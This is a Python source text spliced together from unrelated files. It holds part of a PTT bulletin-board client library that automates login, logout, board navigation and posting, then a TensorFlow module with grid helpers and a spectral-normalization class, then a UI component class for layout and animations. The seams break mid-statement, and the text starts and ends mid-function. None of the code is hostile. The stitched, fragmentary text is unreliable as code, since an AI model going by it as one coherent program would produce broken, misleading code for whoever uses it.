if not os.path.isfile(path + str(p)):
+ ' 系統負荷過重,重新執行連線',
'為避免系統負荷過重, 請稍後再試',
_ResponseUnit(' ', False),
BreakDetect=True,
ErrCode = ErrorCode.WaitTimeout
),
_DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 更新與同步線上使用者及好友名單',
'更新與同步線上使用者及好友名單',
_ResponseUnit('\x1b\x4fD\x1b\x4fD', False)
),
_DetectUnit(
KickMsg,
'刪除其他重複登入的連線',
_ResponseUnit(KickResponse, True)
),
_DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 刪除錯誤嘗試紀錄',
'您要刪除以上錯誤嘗試的記錄嗎',
_ResponseUnit('y\r', False)
),
_DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 登入成功',
'我是' + self.__ID,
_ResponseUnit(' ', False),
BreakDetect=True,
),
_DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 輸入密碼',
'請輸入您的密碼:',
_ResponseUnit(self.__Password + '\r', False)
),
_DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 輸入帳號',
'請輸入代號,或以 guest 參觀,或以 new 註冊:',
_ResponseUnit(self.__ID + '\r', False)
),
self.__PTTBUGDetectUnit
]
LoginFailCount = 0
MaxLoginFail = 2
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('登入超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
self.Log('登入操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__ErrorCode = ErrCode
return ErrCode
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
LoginFailCount = 0
self.Log(DetectTarget.getDisplayMsg())
if '郵件已滿' in DetectTarget.getDisplayMsg():
self.__isMailBoxFull = True
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
if not isDetectedTarget:
if LoginFailCount < MaxLoginFail:
self.Log('頻道 ' + str(ConnectIndex) + ' 讀取 PTT 畫面..')
Refresh = True
LoginFailCount += 1
SendMessage = ''
continue
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
if ErrCode == ErrorCode.WaitTimeout:
Retry = True
elif ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode
if '> (' in self.__ReceiveData[ConnectIndex]:
self.Log('新式游標模式', LogLevel.DEBUG)
self.__Cursor = '>'
self.__isConnected[ConnectIndex] = True
elif '●(' in self.__ReceiveData[ConnectIndex]:
self.Log('舊式游標模式', LogLevel.DEBUG)
self.__Cursor = '●'
self.__isConnected[ConnectIndex] = True
else:
self.Log('頻道 ' + str(ConnectIndex) + ' 無法偵測游標。重新執行連線')
# return ErrorCode.UnknowError
return ErrorCode.Success
def login(self, ID='', Password=''):
self.__IdleTime = 0
if ID != '':
self.__ID = ID
if Password != '':
self.__Password = Password
ErrCode = self.__connectRemote(0)
if ErrCode == ErrorCode.Success:
self.__IdleThread = threading.Thread(target=self.__AntiLogout)
self.__IdleThread.start()
self.__ErrorCode = ErrCode
return ErrCode
def logout(self):
ConnectIndex = -1
self.__IdleTime = 0
self.__RunIdleThread = False
if ConnectIndex == -1:
self.Log('準備登出所有頻道')
for index in range(self.__MaxMultiLogin):
self.__isConnected[index] = False
for index in range(self.__MaxMultiLogin):
if self.__ConnectList[index] is None:
continue
self.Log('頻道 ' + str(index) + ' 登出', LogLevel.DEBUG)
SendMessage = self.__gotoMainMenu + ' g\ry\r'
ErrCode, CatchIndex = self.__operatePTT(index, SendMessage=SendMessage)
self.Log('頻道 ' + str(index) + ' 登出成功')
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode
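# A minimal session sketch (the class name and credentials below are
# placeholders, not names defined in this fragment):
#   bot = PTTLibrary()
#   if bot.login('myid', 'mypassword') == ErrorCode.Success:
#       ...  # do work on one or more channels
#       bot.logout()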
def __getNewestPostIndex(self, Board, ConnectIndex=0, Search='', Author=''):
result = 0
CatchList = [
# 0
'文章選讀',
]
# SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fDqs' + Board + '\r\x03\x03 0\r$'
SendMessage = self.__gotoMainMenu + 'qs' + Board + '\r\x03\x03 '
if Author != '':
SendMessage += 'a' + Author + '\r'
if Search != '':
SendMessage += '/' + Search + '\r'
SendMessage += '0\r$'
Refresh = True
ExtraWait = 0
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=Refresh, ExtraWait=ExtraWait)
if ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode, result
# print(self.__ReceiveData[ConnectIndex])
ReceiveDataLines = self.__ReceiveData[ConnectIndex].split('\n')
ReceiveDataLines = ReceiveDataLines[2:-1]
self.__ReceiveData[ConnectIndex] = '\n'.join(ReceiveDataLines)
self.__ReceiveData[ConnectIndex] = self.__ReceiveData[ConnectIndex][:self.__ReceiveData[ConnectIndex].find('★ ')]
AllIndex = re.findall(r'\d+ ', self.__ReceiveData[ConnectIndex])
if len(AllIndex) == 0:
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode, result
AllIndex = list(set(map(int, AllIndex)))
AllIndex.sort(reverse=True)
# print(AllIndex)
for IndexTemp in AllIndex:
# Check whether the numbers are consecutive; only article indices can be consecutive
isContinue = True
for i in range(1, 3):
if str(IndexTemp - i) not in self.__ReceiveData[ConnectIndex]:
isContinue = False
break
if isContinue:
result = IndexTemp
break
if result == 0:
ErrCode = ErrorCode.ParseError
self.__ErrorCode = ErrCode
return ErrCode, result
# Check for misdetection caused by the previous post's text ending in digits
for i in range(1, 20):
if str(result + 1) in self.__ReceiveData[ConnectIndex]:
result += 1
else:
break
SendMessage = self.__gotoMainMenu + 'qs' + Board + '\r\x03\x03 ' + str(result) + '\rQ'
Refresh = True
isBreakDetect = False
# List order determines detection priority
DetectTargetList = [
_DetectUnit(
'取得可閱讀文章',
'文章代碼',
_ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
_DetectUnit(
'取得可閱讀文章',
'文章網址',
_ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
_DetectUnit(
'取得可閱讀文章',
'這一篇文章值',
_ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
_DetectUnit(
'',
'請按任意鍵繼續',
_ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.UnknowError
),
self.__PTTBUGDetectUnit
]
ShowFixResult = False
for TryResult in range(result, result - 100, -1):
FindResult = False
#self.Log('Try: ' + Board + ' ' + str(TryResult))
SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fDqs' + Board + '\r\x03\x03 ' + str(TryResult) + '\rQ'
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('登入超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
self.Log('登入操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__ErrorCode = ErrCode
return ErrCode, result
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
if ShowFixResult:
self.Log(DetectTarget.getDisplayMsg())
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
self.__isConnected[ConnectIndex] = True
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
if result != TryResult:
if ShowFixResult:
self.Log('修正結果為 ' + str(TryResult), LogLevel.DEBUG)
result = TryResult
FindResult = True
else:
ShowFixResult = True
break
if not isDetectedTarget:
continue
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
# self.Log('無法解析的狀態! PTT Library 緊急停止')
# sys.exit()
if FindResult:
break
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode, result
def post(self, Board, Title, Content, PostType, SignType):
ConnectIndex = 0
self.__IdleTime = 0
if not self.__APICheck():
return self.__ErrorCode
try:
Board = str(Board)
Title = str(Title)
Content = str(Content)
PostType = int(PostType)
SignType = int(SignType)
except (TypeError, ValueError):
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
# Navigate to the board
self.__APILock[ConnectIndex].acquire()
if '看板《' + Board + '》' in self.__ReceiveData[ConnectIndex] and '文章選讀' in self.__ReceiveData[ConnectIndex]:
self.Log('已經位於 ' + Board + ' 板', LogLevel.DEBUG)
else:
CatchList = [
# 0
'文章選讀',
]
SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fDqs' + Board + '\r\x03\x03 '
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=True)
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
if CatchIndex == -1:
self.Log('前進至 ' + Board + '板失敗')
print(self.__ReceiveData[ConnectIndex])
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode
# Check whether we have permission to post
CatchList = [
# 0
'或不選',
# 1
'使用者不可發言',
]
SendMessage = '\x10'
Refresh = False
ExtraWait = 0
Retry = False
RetryCount = 0
while True:
if Retry:
Retry = False
RetryCount += 1
if RetryCount == 3:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
else:
RetryCount = 0
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=Refresh, ExtraWait=ExtraWait)
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
SendMessage = ' '
Refresh = False
ExtraWait = 0
if CatchIndex == 0:
self.Log('具備發文權限', LogLevel.DEBUG)
break
elif CatchIndex == 1:
self.Log('你被水桶惹 QQ')
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.NoPermission
self.__ErrorCode = ErrCode
return ErrCode
else:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex, _LogLevel=LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode
SendMessage = str(PostType) + '\r' + str(Title) + '\r' + str(Content) + '\x18'
self.Log('送出文章', LogLevel.DEBUG)
Refresh = True
ExtraWait = 0
CatchList = [
# 0
'確定要儲存檔案嗎',
]
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=Refresh, ExtraWait=ExtraWait)
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
if CatchIndex == 0:
self.Log('儲存檔案', LogLevel.DEBUG)
SendMessage = 's\r'
else:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex, _LogLevel=LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode
CatchList = [
# 0
'任意鍵繼續',
# 1
'x=隨機',
# 2
'文章選讀',
]
Refresh = True
ExtraWait = 0
while True:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=Refresh, ExtraWait=ExtraWait)
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
if CatchIndex == 0:
break
elif CatchIndex == 1:
self.Log('選擇簽名檔: ' + str(SignType), LogLevel.DEBUG)
SendMessage = str(SignType) + '\r'
elif CatchIndex == 2:
break
else:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex, _LogLevel=LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.UnknowError
self.__ErrorCode = ErrCode
return ErrCode
self.__WaterBallProceeor()
self.__APILock[ConnectIndex].release()
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode
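# Usage sketch for post() (board, title and content are placeholders; PostType
# and SignType are the menu numbers PTT shows when composing):
#   err = bot.post('Test', 'a title', 'some content', 1, 0)
#   assert err == ErrorCode.Success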
def gotoBoard(self, Board):
ConnectIndex = 0
SendMessage = ''
if '看板《' + Board + '》' in self.__ReceiveData[ConnectIndex] and '文章選讀' in self.__ReceiveData[ConnectIndex]:
self.Log('已經位於 ' + Board + ' 板', LogLevel.DEBUG)
else:
# Navigate to the board
SendMessage += '\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fDqs' + Board + '\r\x03\x03 '
CatchList = []
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=True)
if ErrCode != ErrorCode.Success:
self.Log('前往看板' + Board + '失敗')
self.__ErrorCode = ErrCode
return ErrCode
else:
self.Log('前往看板' + Board + '成功!!!')
def gotoArticle(self, PostIndex=0):
ConnectIndex = 0
self.Log('前往文章前')
0])), perm=[1, 0]),
name=name)
return z_batch
def simple_grid(self, grid=None):
""" This function creates simple grid meshes
Note: this function returns np.ndarray
:param grid:
:return:
"""
if self.D != 2:
raise AttributeError('Code length has to be two')
if grid is None:
grid = np.array([[-1.0, 1.0], [-1.0, 1.0]], dtype=np.float32)
x = np.linspace(grid[0][0], grid[0][1], self.mesh_num[0])
y = np.linspace(grid[1][0], grid[1][1], self.mesh_num[1])
z0 = np.reshape(np.transpose(np.tile(x, (self.mesh_num[1], 1))), [-1, 1])
z1 = np.reshape(np.tile(y, (1, self.mesh_num[0])), [-1, 1])
z = np.concatenate((z0, z1), axis=1)
return z, x, y
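# Usage sketch (assumes an instance `sampler` with D == 2 and mesh_num == [H, W];
# `sampler` is an illustrative name, not defined in this module):
#   z, x, y = sampler.simple_grid()
#   # z has shape (H * W, 2); x and y are the 1-D axis grids of lengths H and W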
def j_diagram(self, name=None):
""" This function creates a j diagram using slerp
This function is not finished as there is a problem with the slerp idea.
:param name:
:return:
"""
raise NotImplementedError('This function has not been implemented.')
# z_support = np.random.randn(4, self.D)
# z0 = tf.expand_dims(z_support[0], axis=0) # create 1-by-D vector
# z1 = tf.expand_dims(z_support[1], axis=0)
# z2 = tf.expand_dims(z_support[2], axis=0)
# pass
########################################################################
def mat_slice(mat, row_index, col_index=None, name='slice'):
""" This function gets mat[index, index] where index is either bool or int32.
Note that:
if index is bool, output size is typically smaller than mat unless each element in index is True
if index is int32, output can be any size.
:param mat:
:param row_index:
:param col_index:
:param name:
:return:
"""
if col_index is None:
col_index = row_index
with tf.name_scope(name):
if row_index.dtype != col_index.dtype:
raise AttributeError('dtype of row-index and col-index do not match.')
if row_index.dtype == tf.int32:
return tf.gather(tf.gather(mat, row_index, axis=0), col_index, axis=1)
elif row_index.dtype == tf.bool:
return tf.boolean_mask(tf.boolean_mask(mat, row_index, axis=0), col_index, axis=1)
else:
raise AttributeError('Type of index is: {}; expected either tf.int32 or tf.bool'.format(row_index.dtype))
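# Usage sketch for mat_slice (row and column indices must share one dtype,
# tf.int32 or tf.bool; `mat` is an illustrative placeholder):
#   rows = tf.constant([0, 2], dtype=tf.int32)
#   sub = mat_slice(mat, rows)  # equivalent to mat[[0, 2]][:, [0, 2]]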
########################################################################
def l2normalization(w):
""" This function applies l2 normalization to the input vector.
If w is a matrix / tensor, the Frobenius norm is used for normalization.
:param w:
:return:
"""
# tf.norm is slightly faster than tf.sqrt(tf.reduce_sum(tf.square()))
# it is important that axis=None; in this case, norm(w) = norm(vec(w))
return w / (tf.norm(w, ord='euclidean', axis=None) + FLAGS.EPSI)
class SpectralNorm(object):
def __init__(self, sn_def, name_scope='SN', scope_prefix='', num_iter=1):
""" This class contains functions to calculate the spectral normalization of the weight matrix
using power iteration.
The application of spectral normal to NN is proposed in following papers:
Yoshida, Y., & Miyato, T. (2017).
Spectral Norm Regularization for Improving the Generalizability of Deep Learning.
Miyato, T., Kataoka, T., Koyama, M., & Yoshida, Y. (2017).
Spectral Normalization for Generative Adversarial Networks,
Here spectral normalization is generalized for any linear ops or combination of linear ops
Example of usage:
Example 1.
w = tf.constant(np.random.randn(3, 3, 128, 64).astype(np.float32))
sn_def = {'op': 'tc', 'input_shape': [10, 64, 64, 64],
'output_shape': [10, 128, 64, 64],
'strides': 1, 'dilation': 1, 'padding': 'SAME',
'data_format': 'NCHW'}
sigma = SpectralNorm(sn_def, name_scope='SN1', num_iter=20).apply(w)
Example 2.
w = tf.constant(np.random.randn(3, 3, 128, 64).astype(np.float32))
w2 = tf.constant(np.random.randn(3, 3, 128, 64).astype(np.float32))
sn_def = {'op': 'tc', 'input_shape': [10, 64, 64, 64],
'output_shape': [10, 128, 64, 64],
'strides': 1, 'dilation': 1, 'padding': 'SAME',
'data_format': 'NCHW'}
SN = SpectralNorm(sn_def, num_iter=20)
sigma1 = SN.apply(w)
sigma2 = SN.apply(w2, name_scope='SN2', num_iter=30)
:param sn_def: a dictionary with keys depending on the type of kernel:
type keys value options
dense: 'op' 'd' - common dense layer; 'cd' - conditional dense layers;
'dcd' - dense + conditional dense; 'dck' - dense * conditional scale
'project' - same to cd, except num_out is 1
conv: 'op' 'c' - convolution; 'tc' - transpose convolution;
'cck' - convolution * conditional scale; 'tcck' - t-conv * conditional scale
'strides' integer
'dilation' integer
'padding' 'SAME' or 'VALID'
'data_format' 'NCHW' or 'NHWC'
'input_shape' list of integers in format NCHW or NHWC
'output_shape' for 'tc', output shape must be provided
:param name_scope:
:param scope_prefix:
:param num_iter: number of power iterations per run
"""
self.sn_def = sn_def.copy()
self.name_scope = name_scope
self.scope_prefix = scope_prefix
self.name_in_err = self.scope_prefix + self.name_scope
self.num_iter = num_iter
# initialize
self.w = None
self.x = None
self.use_u = None
self.is_initialized = False
self.forward = None
self.backward = None
# format stride
if self.sn_def['op'] in {'c', 'tc', 'cck', 'tcck'}:
if self.sn_def['data_format'] in ['NCHW', 'channels_first']:
self.sn_def['strides'] = (1, 1, self.sn_def['strides'], self.sn_def['strides'])
else:
self.sn_def['strides'] = (1, self.sn_def['strides'], self.sn_def['strides'], 1)
assert 'output_shape' in self.sn_def, \
'{}: for conv, output_shape must be provided.'.format(self.name_in_err)
def _init_routine(self):
""" This function decides the routine to minimize memory usage
:return:
"""
if self.is_initialized is False:
# decide the routine
if self.sn_def['op'] in {'d', 'project'}:
# for d kernel_shape [num_in, num_out]; for project, kernel shape [num_class, num_in]
assert len(self.kernel_shape) == 2, \
'{}: kernel shape {} does not have length 2'.format(self.name_in_err, self.kernel_shape)
num_in, num_out = self.kernel_shape
# self.use_u = True
self.use_u = num_in <= num_out
x_shape = [1, num_in] if self.use_u else [1, num_out]
self.forward = self._dense_ if self.use_u else self._dense_t_
self.backward = self._dense_t_ if self.use_u else self._dense_
elif self.sn_def['op'] in {'cd'}: # kernel_shape [num_class, num_in, num_out]
assert len(self.kernel_shape) == 3, \
'{}: kernel shape {} does not have length 3'.format(self.name_in_err, self.kernel_shape)
num_class, num_in, num_out = self.kernel_shape
self.use_u = num_in <= num_out
x_shape = [num_class, 1, num_in] if self.use_u else [num_class, 1, num_out]
self.forward = self._dense_ if self.use_u else self._dense_t_
self.backward = self._dense_t_ if self.use_u else self._dense_
elif self.sn_def['op'] in {'dck'}: # convolution * conditional scale
assert isinstance(self.kernel_shape, (list, tuple)) and len(self.kernel_shape) == 2, \
'{}: kernel shape must be a list of length 2. Got {}'.format(self.name_in_err, self.kernel_shape)
assert len(self.kernel_shape[0]) == 2 and len(self.kernel_shape[1]) == 2, \
'{}: kernel shape {} does not have length 2'.format(self.name_in_err, self.kernel_shape)
num_in, num_out = self.kernel_shape[0]
num_class = self.kernel_shape[1][0]
self.use_u = num_in <= num_out
x_shape = [num_class, num_in] if self.use_u else [num_class, num_out]
self.forward = (lambda x: self._scalar_(self._dense_(x, index=0), index=1, offset=1.0)) \
if self.use_u else (lambda y: self._dense_t_(self._scalar_(y, index=1, offset=1.0), index=0))
self.backward = (lambda y: self._dense_t_(self._scalar_(y, index=1, offset=1.0), index=0)) \
if self.use_u else (lambda x: self._scalar_(self._dense_(x, index=0), index=1, offset=1.0))
elif self.sn_def['op'] in {'c', 'tc'}:
assert len(self.kernel_shape) == 4, \
'{}: kernel shape {} does not have length 4'.format(self.name_in_err, self.kernel_shape)
# self.use_u = True
self.use_u = np.prod(self.sn_def['input_shape'][1:]) <= np.prod(self.sn_def['output_shape'][1:])
if self.sn_def['op'] in {'c'}: # input / output shape NCHW or NHWC
x_shape = self.sn_def['input_shape'].copy() if self.use_u else self.sn_def['output_shape'].copy()
x_shape[0] = 1
y_shape = self.sn_def['input_shape'].copy()
y_shape[0] = 1
elif self.sn_def['op'] in {'tc'}: # tc
x_shape = self.sn_def['output_shape'].copy() if self.use_u else self.sn_def['input_shape'].copy()
x_shape[0] = 1
y_shape = self.sn_def['output_shape'].copy()
y_shape[0] = 1
else:
raise NotImplementedError('{}: {} not implemented.'.format(self.name_in_err, self.sn_def['op']))
self.forward = self._conv_ if self.use_u else (lambda y: self._conv_t_(y, x_shape=y_shape))
self.backward = (lambda y: self._conv_t_(y, x_shape=y_shape)) if self.use_u else self._conv_
elif self.sn_def['op'] in {'cck', 'tcck'}: # convolution * conditional scale
assert isinstance(self.kernel_shape, (list, tuple)) and len(self.kernel_shape) == 2, \
'{}: kernel shape must be a list of length 2. Got {}'.format(self.name_in_err, self.kernel_shape)
assert len(self.kernel_shape[0]) == 4 and len(self.kernel_shape[1]) == 4, \
'{}: kernel shape {} does not have length 4'.format(self.name_in_err, self.kernel_shape)
self.use_u = np.prod(self.sn_def['input_shape'][1:]) <= np.prod(self.sn_def['output_shape'][1:])
num_class = self.kernel_shape[1][0]
if self.sn_def['op'] in {'cck'}: # input / output shape NCHW or NHWC
x_shape = self.sn_def['input_shape'].copy() if self.use_u else self.sn_def['output_shape'].copy()
x_shape[0] = num_class
y_shape = self.sn_def['input_shape'].copy()
y_shape[0] = num_class
self.forward = (lambda x: self._scalar_(self._conv_(x, index=0), index=1, offset=1.0)) \
if self.use_u \
else (lambda y: self._conv_t_(self._scalar_(y, index=1, offset=1.0), x_shape=y_shape, index=0))
self.backward = (lambda y: self._conv_t_(
self._scalar_(y, index=1, offset=1.0), x_shape=y_shape, index=0)) \
if self.use_u else (lambda x: self._scalar_(self._conv_(x, index=0), index=1, offset=1.0))
elif self.sn_def['op'] in {'tcck'}: # tcck
x_shape = self.sn_def['output_shape'].copy() if self.use_u else self.sn_def['input_shape'].copy()
x_shape[0] = num_class
y_shape = self.sn_def['output_shape'].copy()
y_shape[0] = num_class
self.forward = (lambda x: self._conv_(self._scalar_(x, index=1, offset=1.0), index=0)) \
if self.use_u \
else (lambda y: self._scalar_(self._conv_t_(y, x_shape=y_shape, index=0), index=1, offset=1.0))
self.backward = (lambda y: self._scalar_(
self._conv_t_(y, x_shape=y_shape, index=0), index=1, offset=1.0)) \
if self.use_u else (lambda x: self._conv_(self._scalar_(x, index=1, offset=1.0), index=0))
else:
raise NotImplementedError('{}: {} not implemented.'.format(self.name_in_err, self.sn_def['op']))
else:
raise NotImplementedError('{}: {} is not implemented.'.format(self.name_in_err, self.sn_def['op']))
self.x = tf.get_variable(
'in_rand', shape=x_shape, dtype=tf.float32,
initializer=tf.truncated_normal_initializer(), trainable=False)
self.is_initialized = True
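# Power-iteration sketch (a conceptual note, not part of the class): with
# forward(x) = W x and backward(y) = W^T y as chosen above, one iteration does
#   y <- forward(x) / ||forward(x)||,  x <- backward(y) / ||backward(y)||
# and sigma = ||forward(x)|| then converges to the largest singular value of
# the linear op, i.e. the spectral norm used for normalization.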
def _scalar_(self, x, index=None, offset=0.0):
""" This function defines an elementwise multiplication op: y = x * w, where
str, str, str]):
"""sets a margin
Args:
margin (Tuple[str, str, str, str]): margin string.
Can be in pixels or percentages
"""
self.imargin = [UIMetric.parse(margin[0]),
UIMetric.parse(margin[1]),
UIMetric.parse(margin[2]),
UIMetric.parse(margin[3])]
@property
def padding(self) -> Tuple[int, int, int, int]:
"""Padding of component in pixels
Returns:
Tuple[int, int, int, int]: pixel padding (left, right, top, bottom)
"""
return (self.ipadding[0].to_pixels(self.width),
self.ipadding[1].to_pixels(self.width),
self.ipadding[2].to_pixels(self.height),
self.ipadding[3].to_pixels(self.height))
@padding.setter
def padding(self, padding: Tuple[str, str, str, str]):
"""sets a padding
Args:
padding (Tuple[str, str, str, str]): padding str.
Can be in pixels or percentages
"""
self.ipadding = [UIMetric.parse(padding[0]),
UIMetric.parse(padding[1]),
UIMetric.parse(padding[2]),
UIMetric.parse(padding[3])]
self._reset("padding")
def add_child(self, child: UIComponent):
"""Add a child component to this component.
NOTE: Order matters, depending on the layout
set in UIComponent.props.layout.
Also triggers a component reset, if the component is dynamically sized.
Args:
child (UIComponent): a child UIComponent
"""
child.parent = self
child.set_chronometer(self._chronometer)
self.children.append(child)
if self.props.resize_mode == ResizeMode.AUTO:
self._reset('add_child')
def has_child(self, child_name: str) -> bool:
for child in self.children:
if child_name == child.name:
return True
return False
def get_child(self, child_name: str) -> Optional[UIComponent]:
for child in self.children:
if child_name == child.name:
return child
return None
def remove_child(self, child_name: str) -> bool:
"""remove a child from this component.
Args:
child_name (str): name of child component.
Returns:
bool: whether or not the child existed in the first place to be removed
"""
for idx, child in enumerate(self.children):
if child.name == child_name:
self.children.pop(idx)
return True
return False
def add_surf(self, surf: Surface, pos: Tuple[int, int]):
"""Add a hard-coded surface to this component.
Args:
surf (Surface): A Surface
pos (Tuple[int, int]): the coordinate position of the top left of surface
"""
self.manual_surfaces.append((pos, surf))
def speed_up_animation(self, multiplier: int):
"""scales the animation of the component and its children
Args:
multiplier (int): the animation speed to be set
"""
self.animation_speed = multiplier
for child in self.children:
child.speed_up_animation(multiplier)
def is_animating(self) -> bool:
"""
Returns:
bool: Is this component currently in the middle of an animation
"""
return len(self.queued_animations) != 0
def any_children_animating(self) -> bool:
"""Returns whether or not any children are currently in the middle of an animation.
Useful for deciding whether or not to shut this component down.
Returns:
bool: Are any children recursively animating?
"""
for child in self.children:
if child.any_children_animating():
return True
if len(child.queued_animations) > 0:
return True
return False
@animated('!enter')
def enter(self):
"""the component enters, i.e. allows it to display.
Because of the @animated tag, will automatically queue
the animation named "!enter" if it exists in the UIObject's
saved animations
"""
for child in self.children:
child.enter()
self.enabled = True
@animated('!exit')
def exit(self, is_top_level=True) -> bool:
"""Makes the component exit, i.e. transitions it out
Because of the @animated tag, will automatically queue
the animation named "!exit" if it exists in the UIObject's
saved animations
This will also recursively exit any children.
Args:
is_top_level (bool): Whether or not this is the top level parent.
If not, then this will not actually disable. This is because if
you disable a top-level component, then you will never render its children
anyway; this will avoid graphical bugs such as children vanishing instantly
before the parent animates out.
Returns:
bool: whether or not this is disabled, or is waiting on children to finish animating.
"""
for child in self.children:
child.exit(False)
if not is_top_level:
return
if self.any_children_animating() or self.is_animating():
# there's an animation playing; wait until afterwards to exit it
self.queue_animation([toggle_anim(False)], force=True)
else:
self.enabled = False
def enable(self):
"""does the same thing as enter(), except forgoes all animations
"""
self.enabled = True
for child in self.children:
child.enable()
def disable(self, is_top_level=True):
"""Does the same as exit(), except forgoes all animations.
"""
self.enabled = False
def queue_animation(self, animations: List[UIAnimation] = [], names: List[str] = [], force: bool = False):
"""Queues a series of animations for the component. This method can be called with
arbitrary animations to play, or it can be called with names corresponding to
an animation saved in its animation dict, or both, with names taking precedence.
The animations will automatically trigger in the order in which they were queued.
NOTE: by default, this does not allow queueing when an animation is already playing.
Args:
animation (List[UIAnimation], optional): A list of animations to queue. Defaults to [].
name (List[str], optional): The names of saved animations. Defaults to [].
force (bool, optional): Whether or not to queue this animation even if other animations are already playing.
Defaults to False.
"""
if not force and self.is_animating():
return
for name in names:
if name in self.saved_animations:
n_animation = self.saved_animations[name]
for anim in n_animation:
anim.component = self
self.queued_animations.append(anim)
for animation in animations:
animation.component = self
self.queued_animations.append(animation)
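# A minimal sketch of both calling styles (assumes `fade_in` is a UIAnimation
# built elsewhere; '!enter' refers to an animation saved via save_animation):
#   component.queue_animation([fade_in])
#   component.queue_animation(names=['!enter'], force=True)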
def push_animation(self, animations: List[UIAnimation] = [], names: List[str] = []):
"""Pushes an animation onto the animation stack, effectively pausing
the current animation and starting another one. N.B. this will not call
the "begin_anim" function of the first animation upon it resuming, so using this may result in
graphical "glitches". Don't use this unless you know exactly why you're using it.
Args:
animation (UIAnimation): The UIAnimation to push and begin *right now*.
"""
for name in names[::-1]:
if name in self.saved_animations:
n_animation = self.saved_animations[name]
for anim in n_animation[::-1]:
anim.component = self
self.queued_animations.insert(0, anim)
for animation in animations[::-1]:
animation.component = self
self.queued_animations.insert(0, animation)
def save_animation(self, animation: UIAnimation, name: str):
"""Adds an animation to the UIComponent's animation dict.
This is useful for adding animations that may be called many times.
Args:
